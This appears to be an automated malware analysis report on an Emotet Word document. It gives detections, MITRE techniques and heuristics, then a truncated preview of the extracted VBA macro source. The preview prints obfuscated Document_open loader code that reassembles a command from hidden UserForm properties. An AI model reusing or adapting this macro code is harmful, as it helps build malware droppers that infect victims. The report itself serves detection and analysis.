MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate or Obfuscate
T1071.001 Web Protocols
The sample contains VBA macros, including a Document_Open macro and a hidden-property command stager, which are indicative of Emotet's typical behavior. The heuristics suggest the macro is designed to download and execute a second-stage payload. ClamAV also identifies the file as Emotet. The obfuscated nature of the VBA code, using split/join and variable reads, points to an attempt to deobfuscate and execute malicious code.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7464371-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7464371-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7885 bytes |
SHA-256: 21cc29f0de2466284c9128418972570ac2340020e21b245e52b669fc17a08b6e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Babbqmlcj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Cmikwaluujqn, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Kthhfohlzqdrn, Zlwsdiorbr
For Zcurqqmkrmj = Jfctszscdefbb To Vbfpdxhifzm
Hsmblwud = Isjowxopooxpp
Hybwwtgxsvls = Hex(Fgmjdwxtjll)
Xmdrcfhexs = Chr(Ecurskfkajh)
Lkwnpplfk = Odimxlhoet - Ccqafhjoesmr
Qicvkttjco = Mobtfmlpulyp
Bugvrrqmuzlji = Hex(Tzcymuum)
Zffqfknqms = Int(Hxkcauci)
Next
Dim Zqrqtwqmoicf, Wmzesnfklywll
For Updayskts = Cggerbte To Nxrwppftth
Fusyfcelt = Rkydhgvsghw
Mdjdeazgqxbm = Hex(Wqarrhgamqly)
Odxiozmbsahth = Chr(Mwrvozcg)
Ymmrsrgna = Ztxmguxakyz - Zutdyymxhcpnz
Iafgsnndtihee = Hypmsyxcp
Prqhyglxr = Hex(Temlrauquisc)
Ynrbkypemyv = Int(Jatgovofla)
Next
Dim Mimsbias, Xuuztqdthotha
For Vaqgooyypzh = Vagcxipkthp To Bedjfiidfik
Jyvezlzmx = Rjroecsbt
Uvguzinpsw = Hex(Zrppidnedxv)
Rtydpitjxeaxe = Chr(Yholatrxpmky)
Ixaoyhppmdow = Nosdqvfv - Rczvjqfknp
Zigfcjvlw = Qjaughkomo
Whtgwxdjsngoj = Hex(Twaynnqjmi)
Ddabsjljxjdyn = Int(Tcdmljvqrmqd)
Next
Dnrpxhnpigyiz
End Sub
Attribute VB_Name = "Gpohsrakivot"
Attribute VB_Base = "0{CB1AFFFE-DD07-4103-ADDB-9C1DA6F10761}{F7A96450-1BAC-492B-9A79-5CD49B7694EA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Nyunlmwq"
Function Yslysiwbq()
Dim Tpwszfkexwj, Ddgdattue
For Nsxkgijmmbe = Rsoyrnbnmifk To Zlcvphgehhay
Xkfyrllhevc = Dbjszhpja
Pfonkhxtz = Hex(Bcgtmhrhhsz)
Dxpbqzdw = Chr(Jlxyxxxjqrnzh)
Vistcnpdl = Swcalsadxh - Ujjjijpdqd
Qkdyltilokfbg = Uydoxfzyj
Huvgwoagj = Hex(Csezdukeicr)
Enoxqrmuggln = Int(Oqaahfewk)
Next
Pyqoaqkph = Babbqmlcj.Cmikwaluujqn
Dim Sufhidnnau, Wfqdimyvtildd
For Uwslbsohkobl = Pbjhhccgl To Scsjjbehlsqh
Fhxfpgbuo = Bvvypoles
Wxamxeroyta = Hex(Ueavhsxo)
Ifijwefd = Chr(Olafcjxczfoat)
Loqwakci = Houvktpjfnje - Yuuoiohmpflq
Qllcenvuc = Myqngthtxyf
Ahkvzpkteit = Hex(Gzhxesnz)
Ryjmexrilvx = Int(Czunxvipxtemh)
Next
Wxnolvnz = Pyqoaqkph + Gpohsrakivot.Ckthgdwwsbeb + Gpohsrakivot.Laqsmtwrvgn + Gpohsrakivot.Rvyvcuib
Dim Vyesjekdq, Pergxfojl
For Hozffpgak = Elngzhugj To Eggrywchljop
Seyvwqfvhag = Fgoehsoktzo
Ydyypvwrhd = Hex(Mxniyflfgw)
Egwdfzfkemrcx = Chr(Kxzydstvva)
Tdldbdbtiysm = Lgzfkkptahgyw - Lbccelhtjq
Pdlenpfhnvqpr = Cdwcgwjw
Jdmemqoloaq = Hex(Tirxwqkn)
Kepmntzg = Int(Odmscbfbede)
Next
Apxdfxefhgcwh = Wxnolvnz + Gpohsrakivot.Xvdyrplk + Gpohsrakivot.Pvjgydaafuu
Dim Mjqrjhxtla, Uwptcfxrq
For Vvguyakqngf = Pzlwwwvad To Kxuyebms
Uwcmztbjrxpk = Ctauuhosr
Aflmltmcku = Hex(Jxcuqlfkz)
Vlasycgbewc = Chr(Pxfedizjzkr)
Mxglwlnppbkb = Esymhzoetgbhq - Wajuhpivt
Kyzwvcpiurb = Xcheajouai
Bggkvxfl = Hex(Pfwlzshspvb)
Eheujlwjqgvuv = Int(Ztvmuimchpkwm)
Next
Yslysiwbq = Fceoxxobnri + Apxdfxefhgcwh + Fceoxxobnri
Dim Bqfrcgnxk, Qvymrccrajoaa
For Qdtykrkfw = Fhdqfewcaioz To Zmkwmpfcupjem
Fpchzwuoj = Eyozcegake
Kpmdnngbsw = Hex(Slrnaexasblh)
Mfxlozfgssmt = Chr(Dbshatgq)
Zghzqidfptaa = Hxpmtzbhy - Rjegtnwtflisf
Ohdnacxlac = Xmrshkbzzzyw
Hyuyfkwj = Hex(Dkwvtxdeptzg)
Aidrkoihiwvz = Int(Xtxnbyox)
Next
End Function
Function Dnrpxhnpigyiz()
Dim Frzmzbrgy, Siydzxcrwpgz
For Uhzmuxukm = Tddudyjinxqh To Axkqszrt
Trudaxi
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.